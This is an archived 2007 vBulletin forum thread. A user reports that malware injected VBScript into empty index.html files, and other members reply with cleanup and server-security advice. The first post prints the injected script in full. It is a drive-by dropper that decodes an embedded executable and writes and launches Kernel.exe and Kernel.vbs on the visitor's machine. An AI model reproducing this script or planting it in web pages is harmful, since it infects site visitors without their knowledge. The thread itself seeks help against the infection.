The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
|
|||||||
|
#1
07-30-2007, 06:55 PM
|
|||
|
|||
Omg, Virus code in Vbulletin files.
Last week, my computer has infected from kernel.exe virus.
I removed that, but now i shocked. It puts this code all index.html pages in Vbulletin folder in my desktop ? It put this code to includes/index.html images/index.html clientscript/index.html etc. Code:
<script language=vbscript>
on error resume next
fileexe1="077090144000003000000000004000000000255255000000184000000000000000000000064000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000184000000000014031186014000180009205033184001076205033084104105115032112114111103114097109032099097110110111116032098101032114117110032105110032068079083032109111100101046013013010036000000000000000000000212036142028144069224079144069224079144069224079030090243079135069224079108101242079147069224079082105099104144069224079"
dim sys
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 "
set fso = df.createobject("Scripting.FileSystemObject","")
set s=df.CreateObject("Shell.Application.1","")
set re=df.createobject("wscript.shell","")
sys=fso.GetSpecialFolder(1)
For a = 1 To Len(filevbs1) Step 3
filevbs2=filevbs2 & chr(mid(filevbs1,a,3))
if a < len(fileexe1)+1 then fileexe2=fileexe2 & chr(mid(fileexe1,a,3))
next
fso.CreateTextFile(sys & "\TSP32E.DLL").write fileexe1
if fso.opentextfile(sys & "\Systeme.dll").readall<>"on" then
fso.CreateTextFile(sys & "\Kernel.exe").write fileexe2
s.Open (sys & "\Kernel.exe")
end if
fso.CreateTextFile(sys & "\TSP32V.DLL").write filevbs1
if fso.opentextfile(sys & "\Systemv.dll").readall<>"on" then
fso.CreateTextFile(sys & "\Kernel.vbs").write filevbs2
s.Open (sys & "\Kernel.vbs")
end if
</script>
Parse error: syntax error, unexpected $end, expecting T_STRING or T_VARIABLE or '{' or '$' from that virus code ? I am very shocked of that .. The full code is this. (I couldnt paste the full code because it is about 24.500 characters) http://rapidshare.com/files/45994675/kernelcode.html 
|
|
#2
07-30-2007, 07:00 PM
|
|||
|
|||
|
This is not default vb code as the index.html are empty. Someone put that there
|
|
#4
07-30-2007, 07:05 PM
|
|||
|
|||
|
Find out who put it there. Have you downloaded any 'dodgy files' lately?
Delete those files also
|
|
#5
07-30-2007, 07:07 PM
|
|||
|
|||
|
Quote:
Also, if you didn't put that there I would suggest looking at how secure your server is, because no one should be able to add that. Check file permissions, change passwords, server logs, etc. Having someone install a virus on your computer through your website is very bad, and should definately be looked into.
|
|
#6
07-30-2007, 07:16 PM
|
|||
|
|||
|
Quote:
http://www.spywareremove.com/removekernelexe.html Maybe after It put the codes to Vbulletin Folder in my desktop. When i got this Parse error: syntax error, unexpected $end, expecting T_STRING or T_VARIABLE or '{' or '$' error, i uploaded vbulletin files from desktop to web, and i have seen that. 
|
 |
«
Previous Thread
|
Next Thread
»
Linear Mode
|
|
All times are GMT. The time now is 05:48 PM.